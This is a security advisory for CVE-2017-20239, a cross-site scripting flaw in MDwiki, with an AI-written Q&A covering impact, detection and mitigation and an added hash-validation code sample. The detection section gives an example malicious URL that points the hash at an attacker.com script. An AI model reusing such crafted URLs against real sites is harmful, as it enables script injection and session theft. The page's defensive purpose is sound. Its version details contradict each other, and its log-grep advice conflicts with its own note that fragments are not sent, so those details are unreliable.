CVE-2017-20239
Cross-Site Scripting in MDwiki via Unsanitized Location Hash
Publication date: 2026-04-12
Last updated on: 2026-04-17
Assigner: VulnCheck
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dynalon | mdwiki | 0.6.2 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2017-20239 is a cross-site scripting (XSS) vulnerability in MDwiki versions prior to 0.6.2. It occurs because MDwiki improperly handles the URL hash fragment (the part after the '#' symbol). Attackers can craft URLs with malicious JavaScript payloads embedded in the hash parameter.
When a victim visits such a crafted URL, MDwiki extracts the hash value and uses it to fetch content dynamically via AJAX without proper sanitization. This content is then rendered as HTML in the victim's browser, allowing the injected malicious scripts to execute in the browser context.
The root cause is the lack of input validation and output sanitization on the dynamically loaded markdown content combined with client-side rendering, enabling attackers to execute arbitrary JavaScript remotely.
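The root cause above comes down to fetching whatever the hash names. The following added example (not MDwiki's code or its actual fix) shows one way to validate a `#!` target before it is fetched; `resolveHashTarget`, the `wiki.example` host and the markdown-only extension rule are assumptions made for illustration.

```javascript
// Added example: hypothetical helper, not MDwiki's own code.
// Resolve a "#!target" location hash to a URL that is safe to fetch and
// render, or return null when the target must be refused.
function resolveHashTarget(hash, pageUrl) {
  if (typeof hash !== 'string' || !hash.startsWith('#!')) return null;

  // Drop any in-page anchor that follows the path ("#!page.md#section").
  let target = hash.slice(2).split('#')[0];
  try {
    target = decodeURIComponent(target);
  } catch (e) {
    return null; // malformed percent-encoding
  }

  // Refuse empty targets, backslashes, control characters and
  // protocol-relative forms before URL parsing normalises them.
  if (target === '' || /[\\\x00-\x1f]/.test(target)) return null;
  if (target.startsWith('//')) return null;

  // Refuse anything carrying a scheme (http:, javascript:, data:, ...).
  if (/^[a-z][a-z0-9+.-]*:/i.test(target)) return null;

  const page = new URL(pageUrl);
  let resolved;
  try {
    resolved = new URL(target, page);
  } catch (e) {
    return null;
  }

  // Backstop on the parsed result: same origin, markdown files only
  // (the extension rule is an assumption for this example).
  if (resolved.origin !== page.origin) return null;
  if (!/\.(md|markdown)$/i.test(resolved.pathname)) return null;
  return resolved.href;
}
```

In a browser the caller would pass `location.hash` and `location.href`, and fetch only when the result is not null.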
How can this vulnerability impact me?
This vulnerability can allow remote attackers to execute arbitrary JavaScript code in the context of a victim's browser when they visit a specially crafted URL. This can lead to several impacts including theft of sensitive information such as cookies or session tokens, unauthorized actions performed on behalf of the user, and potential redirection to malicious sites.
Because the attack requires user interaction (visiting a malicious URL), it can be exploited through phishing or social engineering techniques.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if your MDwiki installation is a version prior to 0.6.2, as these versions improperly handle URL hash fragments leading to cross-site scripting.
To detect exploitation attempts on your system or network, you can monitor HTTP requests for URLs containing suspicious or unexpected hash fragments with JavaScript payloads. Note that browsers do not transmit the fragment (the part after '#') in the HTTP request itself, so a fragment shows up only in sources that recorded the full URL.
- Use web server logs to search for requests with URL fragments containing suspicious patterns, for example, using grep: `grep -i '#!' /var/log/apache2/access.log`
- Look for URLs with hash fragments that include external domains or script tags, e.g., URLs like mdwiki.html#!http://attacker.com/malicious.php
- Use browser developer tools or automated scanners to test if the MDwiki instance executes JavaScript injected via the location hash parameter.
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade MDwiki to version 0.6.2 or later, where this vulnerability has been addressed.
If upgrading is not immediately possible, restrict access to the vulnerable MDwiki instance to trusted users only and avoid clicking or sharing URLs containing hash fragments that could be malicious.
Additionally, consider implementing web application firewall (WAF) rules to block requests containing suspicious hash fragments or external URLs in the location hash.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided information does not specify how the CVE-2017-20239 vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.